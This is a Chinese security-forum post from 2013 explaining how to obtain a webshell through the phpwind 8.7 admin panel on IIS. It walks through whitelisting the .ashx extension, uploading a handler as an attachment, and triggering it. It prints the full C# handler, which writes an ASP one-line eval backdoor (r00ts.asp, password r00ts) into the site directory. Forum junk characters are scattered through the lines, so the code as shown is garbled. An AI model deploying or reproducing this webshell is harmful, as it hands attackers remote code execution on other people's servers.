找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2549|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小; C" S2 ^6 A9 j: h: @5 ?( e' J
$ ?( x: w/ w, O+ F& s! o
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
+ J4 h' _9 @* E% }7 d# m - Y; \0 `/ j, }, S& q( z# D
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
2 Z) S4 F( L, O- n) {" R, R, ~8 n
1 n; R# {  g% i. s然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
; A. A0 a3 L4 f' Z' B& M4 y
8 r' E; B  h; ?9 b4 b打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
9 l& U& N! d* k* M# @  b1 K 4 _+ Z7 r: n: N. ]  [( T3 f
下面是代码:
2 ]5 X: y! ^+ R: y8 r* \9 h ( `7 G! ^5 a' V- `& ]$ o1 ?1 j
<%@ WebHandler Language="C#"Class="Handler" %>
% P2 f+ r, A: ]" U6 Gusing System;
! N$ ]. d. G0 U3 |& F3 kusing System.Web;, T% R! L  h+ Y0 S( ]7 d7 J
using System.IO;
' x% B* ^& u1 ?public class Handler : IHttpHandler {* d5 B% ~0 O1 W$ a9 O& `& a
public void ProcessRequest (HttpContext context) {
% |) X# H4 F5 `context.Response.ContentType = "text/plain";
) `) y4 l  P, H( sStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));; |$ J& {& ~; i7 C2 O" o, g+ `" p
file1.Write("<%eval request(\"r00ts\")%>");
+ p4 g/ @' ^1 a: E" `7 Sfile1.Flush();
2 h0 \! q, o4 J! k# N4 u; K4 S9 `, C' \file1.Close();9 \! @- Z) p8 O
}7 `  D0 u& n- m/ T% G% m
public bool IsReusable {
0 c3 D+ g, M; t+ wget {
' |6 [! z1 ?7 d, greturn false;
6 f+ e+ I  B& q9 `; M}4 g- b/ |; I) t, Z* m
}* V1 J, E+ e/ E1 g9 }3 ?' r
}% i7 L  Q; _& d, w; H/ |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表